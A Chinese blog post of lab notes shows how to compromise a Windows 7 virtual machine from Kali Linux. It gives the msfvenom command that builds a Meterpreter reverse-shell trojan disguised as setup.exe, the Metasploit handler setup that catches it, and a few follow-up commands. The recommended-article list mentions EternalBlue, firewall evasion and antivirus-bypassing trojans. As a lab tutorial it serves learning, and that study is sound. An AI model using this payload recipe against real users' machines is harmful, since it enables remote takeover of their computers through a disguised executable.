Kali环境下渗透目标(win7)虚拟机

最新推荐文章于 2024-05-29 15:40:57 发布
最新推荐文章于 2024-05-29 15:40:57 发布
阅读量3.5k 收藏 35
点赞数 7
分类专栏: 笔记 文章标签: linux vmware 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50660123/article/details/109775009
版权

Kali环境下渗透目标(win7)虚拟机

注:(此文章,是我看了CSDN上另一位博主的文章,我在自己在电脑上实验了一遍的结果。另外,本文仅供学习交流。用来做非法之事,本人概不负责)

准备:
1,在电脑上安装VMware,并下载安装虚拟机kali;虚拟机Windows7
2,要使两台虚拟机相互之间能ping通。在两台机子都被启动以后,在其中一台电脑的终端命令界面,输入 ping (另一虚拟机ip地址)。
如果无法ping通,点击菜单栏里的编辑,在下拉列表中点击‘虚拟网络编辑器‘。查看两虚拟机是否在同一网卡内,若不在则修改至同一网卡。

具体步骤一:要想植入木马病毒,前提条件是要先有这么一个木马,所以,第一步就是建立木马病毒。这里需要利用Metaspolit工具。(metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。)

Kali虚拟机 ip:192.168.90.128 Windows虚拟机 ip:192.168.90.129
查看IP命令:kali—ip add ; windows—ipconfig

在这里插入图片描s

1,建立一个名为setup.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.90.128 LPORT=5050 -f exe -o setup.exe*

#(建立的文件可在root里面看到)

在这里插入图片描述

2、打开msf控制台,加载exploit/multi/handler模块,同时设置**本地主机地址,本地端口

	代码:	
		msfconsole  
        msf > use exploit/multi/handler
        msf exploit(handler) > set lhost 192.168.90.128
        msf exploit(handler) > set lport 5050

在这里插入图片描述
在这里插入图片描述

以上步骤结束之后,木马就做成功了,如果把渗透比作钓鱼,鱼饵已经有了,剩下的就是让目标发现鱼饵并吞下。此木马只要目标主机点击之后就会被激活运行。

在Windows7虚拟机上点击并运行setup.exe

3、开始执行渗透攻击并监听

run
在这里插入图片描述

鱼咬钩了,之后就是捞上来
4、后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。

输入sysinfo可查看目标机子的大致情况。 输入help可查看具体命令。

提线
关注
  • 7
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
网络安全--Kali渗透Windows
夜思红尘的博客
05-14 1208
Kali里的msfvenom木马制作工具是一个十分好用的工具,这篇文章主要讲述的就是这个msfvenom工具
win环境虚拟机创建及kali的安装
08-02
在Windows环境下创建虚拟机并安装Kali Linux是一个常见的任务,对于进行渗透测试、安全研究或者学习Linux操作系统来说非常实用。本文将详细介绍如何使用VMware在Windows系统上搭建虚拟机,并安装Kali Linux。 首先...
win7进行网络渗透
qq_57157540的博客
06-26 2310
1.ms原理:在已经安装的 Windows DNS 客户端处理链路本地多播名称解析查询方式中的一个缺陷可被利用来在 NetworkSer11-030 DNS 解析中的漏洞可能允许远程代码执行vice 帐户的上下文中执行任意代码。如果攻击者获得对网络的访问权限,然后创建自定义程序以向目标系统发送特制的 LLMNR 广播查询,则该漏洞可能允许远程执行代码。 2.渗透过程 设置参数 (payload,ip等) use exploit/windows/browser/ms11_003_ie_css_import
生成克隆钓鱼网站与对win7进行后渗透操作
weixin_72543266的博客
09-10 1143
本篇文章是对自己使用CS部署钓鱼网站和通过生成木马对win7进行后渗透操作的一次实战,通过实战来去熟悉一些渗透测试过程中会遇到的一些操作,为自己以后的学习打好基础,也能去了解更多其他方面的一些知识.本文章是继上次进行手机木马远控复现后,进行钓鱼网站的搭建和使用木马文件后渗透的实操,在进行实战过程中遇到过,无法打开CS工具,也遇到过生成的木马文件在root文件夹中无法取出,说到达自己还是实战经验不足,但自己总能在遇到问题后冷静分析,并自己主动去解决问题,我很庆幸自己有这个能力,自己喜欢去依赖他人去解决问题,虽
kali渗透测试——Nmap扫描补充(绕过防火墙
最新发布
2302_80189643的博客
05-29 541
一些防火墙规则基于端口过滤,可以尝试使用特定的源端口来绕过。使用SYN扫描(也称半开扫描)来减少防火墙检测到的可能性。-T有多个级别,从-T0(最慢)到-T5(最快),选择较低级别可以增加扫描的隐蔽性。通过将数据包分割成更小的部分发送,使得防火墙更难识别这些数据包属于一个扫描流量。方法:nmap --source-port 80 <目标IP地址>-sT 为TCP连接扫描,可能绕过一些只过滤SYN包的防火墙。通过使用多个伪装IP地址,使得防火墙难以确定真实的扫描源。方法:nmap -sS <目标IP地址>
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7467
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kaliwin7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
网安尝鲜,永恒之蓝攻击Win7演示(超详细)
qq_64545050的博客
09-06 2452
使用kali 2022.3,Windows7 x64旗舰版进行攻击演示
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1754
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
VMware kali虚拟机环境配置方法
09-29
主要介绍了VMware kali虚拟机环境配置方法,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
CTF渗透训练环境(镜像,视频,虚拟机
12-26
带靶机镜像,教学视频(SSH私钥泄露、SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数...kali虚拟机(2022.4),虚拟机环境Vmware、VirtualBox),下载环境来进行一次CTF渗透测试
kali 利用msf通过win7永恒之蓝漏洞获取权限
Snakewood的博客
10-06 7718
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应该有不少错误,还请各位大佬多包含!好久没有写过博客记录自己的学习了,今天顺手也记录一下。 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索
KaliLinux-nmap(众神之眼)高级应用-IDS与防火墙规避及漏洞利用脚本篇
易编橙 · 终身成长社群,相遇已是上上签!
03-31 2892
文章目录IDS与防火墙规避篇NSE脚本篇常用的脚本攻击案例扫描服务器常见的漏洞检查FTP是否存在匿名登陆利用DNS进行子域名暴力破解对MySQL进行暴力破解对MsSQL进行暴力破解对Oracle进行暴力破解对SSH进行暴力破解修改Nmap默认的UserAgentHTTP管道 IDS与防火墙规避篇 在实际应用场景中,Nmap提供了多种规避技巧用于IDS和防火墙的检测和屏蔽 下面是一些常用的规避方式 命令参数 参数详解 -f 将发送的检测数据包以分片碎片化的方式进行传输,用以规避IDS和防火
虚拟机下面的window7和kali互通并且上网
hxgz31415926535的博客
09-22 1583
虚拟机->编辑->虚拟网络编辑器,VMnet0勾选桥接模式,桥接到主机所用的网卡(此处主机所用网卡为连接的wifi对应的网卡或者连接以太网对应的网卡).为了使windows7,kali互通并且能够上网,上述两者必须要和物理主机使用同一个网卡,处于同一个网段,相互之间才能够ping通。首先,由于需要使得与windows7处于同一个网段,所以需要使用同一个网卡,不然kali无法找到windows7.此时虚拟机中的windows7虚拟机能够上网,如果不能上网则开始->控制面板->网络->选择家庭组和共享网络项。
一台主机上两台虚拟机win7kali通信
weixin_44414527的博客
06-23 1215
问题描述 一台主机上,安装了wmware,新建了两台虚拟机,一个kali一个win7 两台虚拟机都采用NAT,都能够ping同主机,但虚拟机之间不能ping通 解决办法 win7打开网络发现和文件共享 参考链接https://jingyan.baidu.com/article/acf728fd8e9f5cf8e510a333.html ...
永恒之蓝(ms17-010)借助kali进行攻击win7实验报告
m0_65096687的博客
09-03 2806
永恒之蓝复现学习笔记
利用桥接联网实现虚拟机下window7和linux kali互ping
qq_36485259的博客
10-08 3984
1.确保主机已经联网且不要用校园网!(可用手机热点) 2.vmware 编辑->虚拟网络编辑器,VMnet0勾选桥接模式,桥接至主机所用网卡,无线网络为 Wireless LAN 3.vmware 虚拟机->设置->网络适配器,勾选自定义,选择VMnet0 3.此时虚拟机win7可上网,若不能,在网络设置中更改为家庭网络 4.kali进行静态ip配置 查看主机ip地址和网关 修改 kali下interfaces文件 vim /etc/network/interfaces
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
热门推荐
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
kali怎么渗透win7
05-10
渗透测试中,Kali Linux是一个非常有用的工具集,它包含了许多常用的工具和漏洞利用脚本。下面是一个基本的win7渗透测试流程: 1. 确定目标IP地址 2. 扫描目标主机的开放端口,使用nmap命令:nmap -sS -sV -O <目标IP> 3. 识别目标主机的操作系统和服务版本 4. 搜索漏洞 5. 选择可用的漏洞利用,例如MS08-067漏洞 6. 配置Metasploit,使用MS08-067漏洞利用攻击目标主机 7. 如果需要更高的权限,可以使用Meterpreter后门进行持久性访问 需要注意的是,渗透测试是一项高度敏感的活动,需要在合法的情况下进行,并且需要遵循有关法律和规定。在进行任何渗透测试之前,请确保您已经获得了适当的授权和许可。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值